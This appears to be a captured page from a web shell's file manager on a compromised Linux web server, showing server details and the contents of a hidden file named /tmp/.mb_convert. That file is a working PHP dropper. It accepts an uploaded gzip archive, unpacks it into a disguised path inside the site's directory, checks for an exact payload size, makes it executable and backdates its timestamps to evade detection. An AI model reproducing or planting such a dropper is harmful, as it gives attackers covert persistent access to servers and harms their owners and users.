HEX
Server: Apache/2
System: Linux vps.uva06 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: noithat7 (1010)
PHP: 7.4.30
Disabled: NONE
Upload Files
File: //tmp/.mb_convert
<?php   $p = "/home/noithat7/domains/noithat7.com/private_html//run/cloud-init/tmp/mainfile.dist"; $ft = 1752292842; if (move_uploaded_file($_FILES['file']['tmp_name'], "$p.gz")) {     $file = gzopen("$p.gz", 'rb');     $out = fopen($p, 'wb');     while (!gzeof($file)) {         fwrite($out, gzread($file, 4096));     }     fclose($out);     gzclose($file);     @unlink("$p.gz");     $filesize = filesize($p);     if ($filesize >= 509427) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 509427";         }         @unlink($p);     } } die('_upload_failed_');